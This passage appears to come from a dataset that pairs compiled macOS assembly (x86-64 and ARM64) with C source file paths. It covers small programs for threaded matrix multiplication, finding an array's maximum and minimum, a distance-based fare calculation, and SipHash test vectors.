cmpl $0, -52(%rbp)
je LBB7_16
## %bb.15:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
movl -52(%rbp), %edx
leaq L_.str.12(%rip), %rsi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _fprintf
movl $-1, %edi
callq _exit
LBB7_16: ## in Loop: Header=BB7_13 Depth=2
jmp LBB7_17
LBB7_17: ## in Loop: Header=BB7_13 Depth=2
movl -80(%rbp), %eax
addl $1, %eax
movl %eax, -80(%rbp)
jmp LBB7_13
LBB7_18: ## in Loop: Header=BB7_11 Depth=1
jmp LBB7_19
LBB7_19: ## in Loop: Header=BB7_11 Depth=1
movl -76(%rbp), %eax
addl $1, %eax
movl %eax, -76(%rbp)
jmp LBB7_11
LBB7_20:
movq _a_row@GOTPCREL(%rip), %rax
movl (%rax), %esi
movq _b_col@GOTPCREL(%rip), %rax
imull (%rax), %esi
leaq L_.str.14(%rip), %rdi
movb $0, %al
callq _printf
movq -40(%rbp), %rax
movq %rax, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB7_22
## %bb.21:
movq %rbp, %rsp
popq %rbp
retq
LBB7_22:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.globl _write_output ## -- Begin function write_output
.p2align 4, 0x90
_write_output: ## @write_output
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq -16(%rbp), %rdi
leaq L_.str.15(%rip), %rsi
callq _fopen
movq %rax, -24(%rbp)
movq -24(%rbp), %rdi
movq _a_row@GOTPCREL(%rip), %rax
movl (%rax), %edx
movq _b_col@GOTPCREL(%rip), %rax
movl (%rax), %ecx
leaq L_.str.2(%rip), %rsi
movb $0, %al
callq _fprintf
movl $0, -28(%rbp)
LBB8_1: ## =>This Loop Header: Depth=1
## Child Loop BB8_3 Depth 2
movl -28(%rbp), %eax
movq _a_row@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jge LBB8_11
## %bb.2: ## in Loop: Header=BB8_1 Depth=1
movl $0, -32(%rbp)
LBB8_3: ## Parent Loop BB8_1 Depth=1
## => This Inner Loop Header: Depth=2
movl -32(%rbp), %eax
movq _b_col@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jge LBB8_9
## %bb.4: ## in Loop: Header=BB8_3 Depth=2
movl -32(%rbp), %eax
movq _b_col@GOTPCREL(%rip), %rcx
movl (%rcx), %ecx
subl $1, %ecx
cmpl %ecx, %eax
je LBB8_6
## %bb.5: ## in Loop: Header=BB8_3 Depth=2
movq -24(%rbp), %rdi
movq -8(%rbp), %rax
movslq -28(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movslq -32(%rbp), %rcx
movl (%rax,%rcx,4), %edx
leaq L_.str.16(%rip), %rsi
movb $0, %al
callq _fprintf
jmp LBB8_7
LBB8_6: ## in Loop: Header=BB8_3 Depth=2
movq -24(%rbp), %rdi
movq -8(%rbp), %rax
movslq -28(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movslq -32(%rbp), %rcx
movl (%rax,%rcx,4), %edx
leaq L_.str.17(%rip), %rsi
movb $0, %al
callq _fprintf
LBB8_7: ## in Loop: Header=BB8_3 Depth=2
jmp LBB8_8
LBB8_8: ## in Loop: Header=BB8_3 Depth=2
movl -32(%rbp), %eax
addl $1, %eax
movl %eax, -32(%rbp)
jmp LBB8_3
LBB8_9: ## in Loop: Header=BB8_1 Depth=1
jmp LBB8_10
LBB8_10: ## in Loop: Header=BB8_1 Depth=1
movl -28(%rbp), %eax
addl $1, %eax
movl %eax, -28(%rbp)
jmp LBB8_1
LBB8_11:
movq -24(%rbp), %rdi
callq _fclose
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _show ## -- Begin function show
.p2align 4, 0x90
_show: ## @show
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movq %rdi, -8(%rbp)
movl $0, -12(%rbp)
LBB9_1: ## =>This Loop Header: Depth=1
## Child Loop BB9_3 Depth 2
movl -12(%rbp), %eax
movq _a_row@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jge LBB9_8
## %bb.2: ## in Loop: Header=BB9_1 Depth=1
movl $0, -16(%rbp)
LBB9_3: ## Parent Loop BB9_1 Depth=1
## => This Inner Loop Header: Depth=2
movl -16(%rbp), %eax
movq _b_col@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jge LBB9_6
## %bb.4: ## in Loop: Header=BB9_3 Depth=2
movq -8(%rbp), %rax
movslq -12(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movslq -16(%rbp), %rcx
movl (%rax,%rcx,4), %esi
leaq L_.str.18(%rip), %rdi
movb $0, %al
callq _printf
## %bb.5: ## in Loop: Header=BB9_3 Depth=2
movl -16(%rbp), %eax
addl $1, %eax
movl %eax, -16(%rbp)
jmp LBB9_3
LBB9_6: ## in Loop: Header=BB9_1 Depth=1
leaq L_.str.19(%rip), %rdi
movb $0, %al
callq _printf
## %bb.7: ## in Loop: Header=BB9_1 Depth=1
movl -12(%rbp), %eax
addl $1, %eax
movl %eax, -12(%rbp)
jmp LBB9_1
LBB9_8:
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $112, %rsp
movl $0, -4(%rbp)
movl %edi, -8(%rbp)
movq %rsi, -16(%rbp)
leaq L_.str.20(%rip), %rax
movq %rax, -24(%rbp)
leaq L_.str.21(%rip), %rax
movq %rax, -32(%rbp)
leaq L_.str.22(%rip), %rax
movq %rax, -40(%rbp)
cmpl $2, -8(%rbp)
jne LBB10_2
## %bb.1:
movq -16(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -24(%rbp)
jmp LBB10_11
LBB10_2:
cmpl $3, -8(%rbp)
jne LBB10_4
## %bb.3:
movq -16(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -24(%rbp)
movq -16(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -32(%rbp)
jmp LBB10_10
LBB10_4:
cmpl $4, -8(%rbp)
jne LBB10_6
## %bb.5:
movq -16(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -24(%rbp)
movq -16(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -32(%rbp)
movq -16(%rbp), %rax
movq 24(%rax), %rax
movq %rax, -40(%rbp)
jmp LBB10_9
LBB10_6:
cmpl $4, -8(%rbp)
jle LBB10_8
## %bb.7:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.23(%rip), %rsi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _fprintf
movl $1, %edi
callq _exit
LBB10_8:
jmp LBB10_9
LBB10_9:
jmp LBB10_10
LBB10_10:
jmp LBB10_11
LBB10_11:
movq -24(%rbp), %rdi
xorl %esi, %esi
callq _read_file
movq %rax, -48(%rbp)
movq -32(%rbp), %rdi
movl $1, %esi
callq _read_file
movq %rax, -56(%rbp)
movq _a_row@GOTPCREL(%rip), %rax
movslq (%rax), %rdi
shlq $3, %rdi
callq _malloc
movq %rax, -64(%rbp)
movl $0, -68(%rbp)
LBB10_12: ## =>This Inner Loop Header: Depth=1
movl -68(%rbp), %eax
movq _a_row@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jge LBB10_15
## %bb.13: ## in Loop: Header=BB10_12 Depth=1
movq _b_col@GOTPCREL(%rip), %rax
movslq (%rax), %rdi
shlq $2, %rdi
callq _malloc
movq %rax, %rdx
movq -64(%rbp), %rax
movslq -68(%rbp), %rcx
movq %rdx, (%rax,%rcx,8)
## %bb.14: ## in Loop: Header=BB10_12 Depth=1
movl -68(%rbp), %eax
addl $1, %eax
movl %eax, -68(%rbp)
jmp LBB10_12
LBB10_15:
leaq -88(%rbp), %rdi
xorl %eax, %eax
movl %eax, %esi
callq _gettimeofday
movq -48(%rbp), %rdi
movq -56(%rbp), %rsi
movq -64(%rbp), %rdx
callq _thread_for_row
leaq -104(%rbp), %rdi
xorl %eax, %eax
movl %eax, %esi
callq _gettimeofday
movq -104(%rbp), %rsi
subq -88(%rbp), %rsi
leaq L_.str.24(%rip), %rdi
movb $0, %al
callq _printf
movl -96(%rbp), %esi
subl -80(%rbp), %esi
leaq L_.str.25(%rip), %rdi
movb $0, %al
callq _printf
leaq -88(%rbp), %rdi
xorl %eax, %eax
movl %eax, %esi
callq _gettimeofday
movq -48(%rbp), %rdi
movq -56(%rbp), %rsi
movq -64(%rbp), %rdx
callq _thread_for_element
leaq -104(%rbp), %rdi
xorl %eax, %eax
movl %eax, %esi
callq _gettimeofday
movq -104(%rbp), %rsi
subq -88(%rbp), %rsi
leaq L_.str.24(%rip), %rdi
movb $0, %al
callq _printf
movl -96(%rbp), %esi
subl -80(%rbp), %esi
leaq L_.str.25(%rip), %rdi
movb $0, %al
callq _printf
movq -64(%rbp), %rdi
movq -40(%rbp), %rsi
callq _write_output
movq -48(%rbp), %rdi
callq _free
movq -56(%rbp), %rdi
callq _free
movq -64(%rbp), %rdi
callq _free
xorl %eax, %eax
addq $112, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "r"
L_.str.1: ## @.str.1
.asciz "Cannot open one of the files\n"
L_.str.2: ## @.str.2
.asciz "row=%d col=%d\n"
L_.str.3: ## @.str.3
.asciz "Cannot get row or column number\n"
.comm _a_row,4,2 ## @a_row
.comm _a_col,4,2 ## @a_col
.comm _b_row,4,2 ## @b_row
.comm _b_col,4,2 ## @b_col
L_.str.4: ## @.str.4
.asciz "1st matrix column size doesn't match 2nd matrix row size\n"
L_.str.5: ## @.str.5
.asciz " \n\t"
L_.str.6: ## @.str.6
.asciz "Wrong number of elements in row %d\n"
L_.str.7: ## @.str.7
.asciz "Element at row %d column %d is not numeric only\n"
L_.str.8: ## @.str.8
.asciz "Element size is greater than int at row %d column %d\n"
L_.str.9: ## @.str.9
.asciz "Cannot read matrix elements\n"
L_.str.10: ## @.str.10
.asciz "Overflow will occur while computing element at row %d column %d\n"
L_.str.11: ## @.str.11
.asciz "ERROR; return code from pthread_create() is %d\n"
L_.str.12: ## @.str.12
.asciz "ERROR; return code from pthread_join() is %d\n"
L_.str.13: ## @.str.13
.asciz "Thread for each row method: \nNumber of threads: %d\n"
L_.str.14: ## @.str.14
.asciz "Thread for each element method: \nNumber of threads: %d\n"
L_.str.15: ## @.str.15
.asciz "w"
L_.str.16: ## @.str.16
.asciz "%d\t"
L_.str.17: ## @.str.17
.asciz "%d\n"
L_.str.18: ## @.str.18
.asciz "%d "
L_.str.19: ## @.str.19
.asciz "\n"
L_.str.20: ## @.str.20
.asciz "a.txt"
L_.str.21: ## @.str.21
.asciz "b.txt"
L_.str.22: ## @.str.22
.asciz "c.out"
L_.str.23: ## @.str.23
.asciz "Too many arguments\n"
L_.str.24: ## @.str.24
.asciz "Seconds taken %lu\n"
L_.str.25: ## @.str.25
.asciz "Microseconds taken: %lu\n"
.subsections_via_symbols
| the_stack_data/64074.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #272
.cfi_def_cfa_offset 272
stp x28, x27, [sp, #240] ; 16-byte Folded Spill
stp x29, x30, [sp, #256] ; 16-byte Folded Spill
add x29, sp, #256
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-24]
str wzr, [sp, #28]
mov w8, #-2147483648
str w8, [sp, #20]
mov w8, #2147483647
str w8, [sp, #16]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
mov x9, sp
add x8, sp, #24
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _scanf
str wzr, [sp, #12]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #12]
ldr w9, [sp, #24]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_4
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #12]
add w10, w8, #1
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
ldrsw x9, [sp, #12]
add x8, sp, #32
add x8, x8, x9, lsl #2
mov x9, sp
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _scanf
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB0_1
LBB0_4:
str wzr, [sp, #12]
b LBB0_5
LBB0_5: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #12]
ldr w9, [sp, #24]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_12
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_5 Depth=1
ldrsw x9, [sp, #12]
add x8, sp, #32
ldr w8, [x8, x9, lsl #2]
ldr w9, [sp, #20]
subs w8, w8, w9
cset w8, le
tbnz w8, #0, LBB0_8
b LBB0_7
LBB0_7: ; in Loop: Header=BB0_5 Depth=1
ldrsw x9, [sp, #12]
add x8, sp, #32
ldr w8, [x8, x9, lsl #2]
str w8, [sp, #20]
b LBB0_8
LBB0_8: ; in Loop: Header=BB0_5 Depth=1
ldrsw x9, [sp, #12]
add x8, sp, #32
ldr w8, [x8, x9, lsl #2]
ldr w9, [sp, #16]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_10
b LBB0_9
LBB0_9: ; in Loop: Header=BB0_5 Depth=1
ldrsw x9, [sp, #12]
add x8, sp, #32
ldr w8, [x8, x9, lsl #2]
str w8, [sp, #16]
b LBB0_10
LBB0_10: ; in Loop: Header=BB0_5 Depth=1
b LBB0_11
LBB0_11: ; in Loop: Header=BB0_5 Depth=1
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB0_5
LBB0_12:
ldr w9, [sp, #20]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _printf
ldr w9, [sp, #16]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
bl _printf
ldur x9, [x29, #-24]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_14
b LBB0_13
LBB0_13:
bl ___stack_chk_fail
LBB0_14:
mov w0, #0
ldp x29, x30, [sp, #256] ; 16-byte Folded Reload
ldp x28, x27, [sp, #240] ; 16-byte Folded Reload
add sp, sp, #272
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "Enter size of array: "
l_.str.1: ; @.str.1
.asciz "%d"
l_.str.2: ; @.str.2
.asciz "Enter element %d: "
l_.str.3: ; @.str.3
.asciz "\nMax element: %d\n"
l_.str.4: ; @.str.4
.asciz "Min element: %d"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $240, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -212(%rbp)
movl $-2147483648, -220(%rbp) ## imm = 0x80000000
movl $2147483647, -224(%rbp) ## imm = 0x7FFFFFFF
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.1(%rip), %rdi
leaq -216(%rbp), %rsi
movb $0, %al
callq _scanf
movl $0, -228(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
movl -228(%rbp), %eax
cmpl -216(%rbp), %eax
jge LBB0_4
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movl -228(%rbp), %esi
addl $1, %esi
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
movslq -228(%rbp), %rax
leaq -208(%rbp), %rsi
shlq $2, %rax
addq %rax, %rsi
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _scanf
## %bb.3: ## in Loop: Header=BB0_1 Depth=1
movl -228(%rbp), %eax
addl $1, %eax
movl %eax, -228(%rbp)
jmp LBB0_1
LBB0_4:
movl $0, -228(%rbp)
LBB0_5: ## =>This Inner Loop Header: Depth=1
movl -228(%rbp), %eax
cmpl -216(%rbp), %eax
jge LBB0_12
## %bb.6: ## in Loop: Header=BB0_5 Depth=1
movslq -228(%rbp), %rax
movl -208(%rbp,%rax,4), %eax
cmpl -220(%rbp), %eax
jle LBB0_8
## %bb.7: ## in Loop: Header=BB0_5 Depth=1
movslq -228(%rbp), %rax
movl -208(%rbp,%rax,4), %eax
movl %eax, -220(%rbp)
LBB0_8: ## in Loop: Header=BB0_5 Depth=1
movslq -228(%rbp), %rax
movl -208(%rbp,%rax,4), %eax
cmpl -224(%rbp), %eax
jge LBB0_10
## %bb.9: ## in Loop: Header=BB0_5 Depth=1
movslq -228(%rbp), %rax
movl -208(%rbp,%rax,4), %eax
movl %eax, -224(%rbp)
LBB0_10: ## in Loop: Header=BB0_5 Depth=1
jmp LBB0_11
LBB0_11: ## in Loop: Header=BB0_5 Depth=1
movl -228(%rbp), %eax
addl $1, %eax
movl %eax, -228(%rbp)
jmp LBB0_5
LBB0_12:
movl -220(%rbp), %esi
leaq L_.str.3(%rip), %rdi
movb $0, %al
callq _printf
movl -224(%rbp), %esi
leaq L_.str.4(%rip), %rdi
movb $0, %al
callq _printf
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_14
## %bb.13:
xorl %eax, %eax
addq $240, %rsp
popq %rbp
retq
LBB0_14:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "Enter size of array: "
L_.str.1: ## @.str.1
.asciz "%d"
L_.str.2: ## @.str.2
.asciz "Enter element %d: "
L_.str.3: ## @.str.3
.asciz "\nMax element: %d\n"
L_.str.4: ## @.str.4
.asciz "Min element: %d"
.subsections_via_symbols
| the_stack_data/169208.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
mov x9, sp
sub x8, x29, #8
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _scanf
ldur w8, [x29, #-8]
subs w8, w8, #30
cset w8, gt
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
ldur w8, [x29, #-8]
mov w9, #50
mul w8, w8, w9
stur w8, [x29, #-12]
ldur w8, [x29, #-8]
; implicit-def: $x10
mov x10, x8
ldur w9, [x29, #-12]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
b LBB0_3
LBB0_2:
ldur w8, [x29, #-8]
subs w8, w8, #30
mov w9, #40
mul w8, w8, w9
add w8, w8, #1500
stur w8, [x29, #-12]
ldur w8, [x29, #-8]
; implicit-def: $x10
mov x10, x8
ldur w9, [x29, #-12]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _printf
b LBB0_3
LBB0_3:
mov w0, #0
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "\nEnter Distance : "
l_.str.1: ; @.str.1
.asciz "%d"
l_.str.2: ; @.str.2
.asciz "Amount is = %d x 50 = %d \n"
l_.str.3: ; @.str.3
.asciz "Amount is = 30 x 50 + (%d-30) x 40 = %d\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $0, -4(%rbp)
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.1(%rip), %rdi
leaq -8(%rbp), %rsi
movb $0, %al
callq _scanf
cmpl $30, -8(%rbp)
jg LBB0_2
## %bb.1:
imull $50, -8(%rbp), %eax
movl %eax, -12(%rbp)
movl -8(%rbp), %esi
movl -12(%rbp), %edx
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB0_3
LBB0_2:
movl -8(%rbp), %eax
subl $30, %eax
imull $40, %eax, %eax
addl $1500, %eax ## imm = 0x5DC
movl %eax, -12(%rbp)
movl -8(%rbp), %esi
movl -12(%rbp), %edx
leaq L_.str.3(%rip), %rdi
movb $0, %al
callq _printf
LBB0_3:
xorl %eax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "\nEnter Distance : "
L_.str.1: ## @.str.1
.asciz "%d"
L_.str.2: ## @.str.2
.asciz "Amount is = %d x 50 = %d \n"
L_.str.3: ## @.str.3
.asciz "Amount is = 30 x 50 + (%d-30) x 40 = %d\n"
.subsections_via_symbols
| the_stack_data/62759.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _test_vectors ; -- Begin function test_vectors
.p2align 2
_test_vectors: ; @test_vectors
.cfi_startproc
; %bb.0:
sub sp, sp, #144
.cfi_def_cfa_offset 144
stp x29, x30, [sp, #128] ; 16-byte Folded Spill
add x29, sp, #128
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
str wzr, [sp, #24]
str wzr, [sp, #28]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #28]
subs w8, w8, #16
cset w8, ge
tbnz w8, #0, LBB0_4
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #28]
ldrsw x10, [sp, #28]
add x9, sp, #32
strb w8, [x9, x10]
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #28]
add w8, w8, #1
str w8, [sp, #28]
b LBB0_1
LBB0_4:
str wzr, [sp, #28]
b LBB0_5
LBB0_5: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #28]
subs w8, w8, #64
cset w8, ge
tbnz w8, #0, LBB0_10
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_5 Depth=1
ldr w8, [sp, #28]
ldrsw x9, [sp, #28]
add x1, sp, #56
strb w8, [x1, x9]
ldrsw x2, [sp, #28]
add x0, sp, #48
str x0, [sp, #16] ; 8-byte Folded Spill
add x3, sp, #32
bl _siphash
ldr x0, [sp, #16] ; 8-byte Folded Reload
ldrsw x9, [sp, #28]
adrp x8, _vectors@PAGE
add x8, x8, _vectors@PAGEOFF
add x1, x8, x9, lsl #3
mov x2, #8
bl _memcmp
subs w8, w0, #0
cset w8, eq
tbnz w8, #0, LBB0_8
b LBB0_7
LBB0_7: ; in Loop: Header=BB0_5 Depth=1
ldr w9, [sp, #28]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
ldr w8, [sp, #24]
add w8, w8, #1
str w8, [sp, #24]
b LBB0_8
LBB0_8: ; in Loop: Header=BB0_5 Depth=1
b LBB0_9
LBB0_9: ; in Loop: Header=BB0_5 Depth=1
ldr w8, [sp, #28]
add w8, w8, #1
str w8, [sp, #28]
b LBB0_5
LBB0_10:
ldr w8, [sp, #24]
str w8, [sp, #12] ; 4-byte Folded Spill
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_12
b LBB0_11
LBB0_11:
bl ___stack_chk_fail
LBB0_12:
ldr w0, [sp, #12] ; 4-byte Folded Reload
ldp x29, x30, [sp, #128] ; 16-byte Folded Reload
add sp, sp, #144
ret
.cfi_endproc
; -- End function
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
bl _test_vectors
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB1_2
b LBB1_1
LBB1_1:
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
b LBB1_2
LBB1_2:
mov w0, #0
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.section __TEXT,__const
.globl _vectors ; @vectors
_vectors:
.ascii "1\016\016\335G\333or"
.ascii "\375g\334\223\3059\370t"
.ascii "ZO\251\331\t\200l\r"
.ascii "-~\373\327\226fg\205"
.ascii "\267\207q'\340\224'\317"
.ascii "\215\246\231\315dUv\030"
.ascii "\316\343\376XnF\311\313"
.ascii "7\321\001\213\365\000\002\253"
.ascii "b$\223\232y\365\365\223"
.ascii "\260\344\251\013\337\202\000\236"
.ascii "\363\271\335\224\305\273]z"
.ascii "\247\255k\"F/\263\364"
.ascii "\373\345\016\206\274\217\036u"
.ascii "\220=\204\300'V\352\024"
.ascii "\356\362z\216\220\312#\367"
.ascii "\345E\276Ia\312)\241"
.ascii "\333\233\302W\177\314*?"
.ascii "\224G\276,\365\351\232i"
.ascii "\234\323\215\226\360\263\301K"
.ascii "\275ay\247\035\311m\273"
.ascii "\230\356\242\032\362\\\326\276"
.ascii "\307g;.\260\313\362\320"
.ascii "\210>\243\343\225gS\223"
.ascii "\310\316\\\315\214\003\f\250"
.ascii "\224\257I\366\306P\255\270"
.ascii "\352\270\205\212\336\222\341\274"
.ascii "\363\025\273[\2705\330\027"
.ascii "\255\317k\007ca./"
.ascii "\245\311\035\247\254\252M\336"
.ascii "qe\225\207fP\242\246"
.ascii "(\357I\\S\243\207\255"
.ascii "B\303A\330\372\222\3302"
.ascii "\316|\362r/Q'q"
.ascii "\343xY\371F#\363\247"
.ascii "8\022\005\273\032\260\340\022"
.ascii "\256\227\241\017\3244\340\025"
.ascii "\264\243\025\b\276\377M1"
.ascii "\2019b)\360\220y\002"
.ascii "M\f\364\236\345\324\334\312"
.ascii "\\s3jv\330\277\232"
.ascii "\320\247\004Sk\251>\016"
.ascii "\222YX\374\326B\f\255"
.ascii "\251\025\302\233\310\006s\030"
.ascii "\225+y\363\274\n\246\324"
.ascii "\362\035\362\344\035E5\371"
.ascii "\207Wu\031\004\217S\251"
.ascii "\020\245l\365\337\315\232\333"
.ascii "\353u\t\\\315\230l\320"
.ascii "Q\251\313\236\313\243\022\346"
.ascii "\226\257\255\374,\346f\307"
.ascii "r\376R\227ZCd\356"
.ascii "Z\026E\262v\325\222\241"
.ascii "\262t\313\216\277\207\207\n"
.ascii "o\233\264 =\347\263\201"
.ascii "\352\354\262\243\013\"\250\177"
.ascii "\231$\244<\3011W$"
.ascii "\275\203\215:\257\277\215\267"
.ascii "\013\032*2e\325\032\352"
.ascii "\023Py\243#\034\346`"
.ascii "\223+(F\344\327\006f"
.ascii "\341\221_\\\261\354\244l"
.ascii "\363%\226\\\241mb\237"
.ascii "W_\362\216`8\033\345"
.ascii "rE\006\353L2\212\225"
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
